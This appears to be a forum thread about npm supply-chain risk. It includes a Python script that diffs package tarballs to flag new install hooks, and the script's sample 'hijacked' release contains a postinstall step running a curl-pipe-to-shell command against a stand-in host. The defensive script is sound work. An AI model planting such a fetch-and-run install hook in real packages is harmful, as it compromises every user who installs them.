How are you supposed to gain collaborators for a project that no one can possibly find?

There are ways, but at a high level, I don't care. I hate how modern package managers have come to value author convenience over downstream user security.

Fair enough.

In the meantime, I'm trying to do my part through occasional random spot inspections when there's an update to a package, and encourage others to do the same for swarm coverage.
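One concrete way to do such a spot inspection, as an added example that is not the commenter's own tooling: fetch the previous and the updated tarball of a package (for npm, `npm pack name@version` or the URL from `npm view name dist.tarball`) and diff them at the file level, paying special attention to install-time lifecycle scripts, which is where a hijacked package typically hides its payload. The script below assumes the `package/` top-level directory layout that `npm pack` produces; the two tarballs it inspects are constructed inline so it runs offline, and the "suspicious" heuristic (new or changed install hooks, new files that spawn processes or use `eval`) is an assumption chosen for illustration, not a complete detector.

```python
import io
import json
import tarfile

# Lifecycle hooks npm runs automatically during install. A new or changed
# one in an update is the classic supply-chain warning sign.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Crude content markers for newly added files (assumed heuristic, not exhaustive).
PAYLOAD_MARKERS = (b"child_process", b"eval(", b"Function(")


def build_tarball(files):
    """Build an in-memory .tgz shaped like `npm pack` output (entries under
    `package/`). Used here only to construct sample data for the example."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            data = content.encode()
            info = tarfile.TarInfo(name="package/" + name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def read_tarball(blob):
    """Return {path: bytes} for every regular file in an npm-style tarball."""
    out = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for member in tar.getmembers():
            if member.isfile():
                out[member.name] = tar.extractfile(member).read()
    return out


def inspect_update(old_blob, new_blob):
    """Diff two package tarballs and flag install-hook changes and
    suspicious new files. Returns a plain dict so it can be logged or asserted on."""
    old, new = read_tarball(old_blob), read_tarball(new_blob)
    report = {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "changed": sorted(p for p in old.keys() & new.keys() if old[p] != new[p]),
        "hook_changes": {},
        "flagged_files": [],
    }

    # Compare install-time scripts declared in package.json.
    old_scripts = json.loads(old.get("package/package.json", b"{}")).get("scripts", {})
    new_scripts = json.loads(new.get("package/package.json", b"{}")).get("scripts", {})
    for hook in INSTALL_HOOKS:
        if old_scripts.get(hook) != new_scripts.get(hook):
            report["hook_changes"][hook] = (old_scripts.get(hook), new_scripts.get(hook))

    # Newly added files containing process-spawning or dynamic-eval markers.
    for path in report["added"]:
        if any(marker in new[path] for marker in PAYLOAD_MARKERS):
            report["flagged_files"].append(path)

    report["suspicious"] = bool(report["hook_changes"] or report["flagged_files"])
    return report


# Constructed sample data: a small package, a benign patch release, and a
# "hijacked" release that adds a postinstall hook plus the script it runs.
_V1 = {
    "package.json": json.dumps({"name": "tiny-util", "version": "1.0.0", "main": "index.js"}),
    "index.js": "module.exports = (s) => s.trim();\n",
    "README.md": "# tiny-util\n",
}
_V1_1 = dict(_V1, **{
    "package.json": json.dumps({"name": "tiny-util", "version": "1.0.1", "main": "index.js"}),
    "index.js": "module.exports = (s) => String(s).trim();\n",
})
_V1_2 = dict(_V1_1, **{
    "package.json": json.dumps({"name": "tiny-util", "version": "1.0.2", "main": "index.js",
                                "scripts": {"postinstall": "node setup.js"}}),
    "setup.js": "require('child_process').exec('curl -s https://example.invalid/x | sh');\n",
})

OLD_TARBALL = build_tarball(_V1)
BENIGN_TARBALL = build_tarball(_V1_1)
HIJACKED_TARBALL = build_tarball(_V1_2)

if __name__ == "__main__":
    print(json.dumps(inspect_update(OLD_TARBALL, BENIGN_TARBALL), indent=2))
    print(json.dumps(inspect_update(BENIGN_TARBALL, HIJACKED_TARBALL), indent=2))
```

Run against real tarballs by replacing the constructed blobs with the bytes of two downloaded `.tgz` files. The file-level diff is the part worth eyeballing; the heuristics only decide which update deserves a closer look first.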

Ahh, the classic "I don't care." What if other people don't care about your problems? What if both sides don't care about each other? What then?

We wait and see whether the supply chain attacks crescendo to a crisis and force NPM's hand. In the meantime I'm doing everything I can to avoid NPM and to uphold "just don't use the software if you don't like it"... but people like myself don't always have a choice.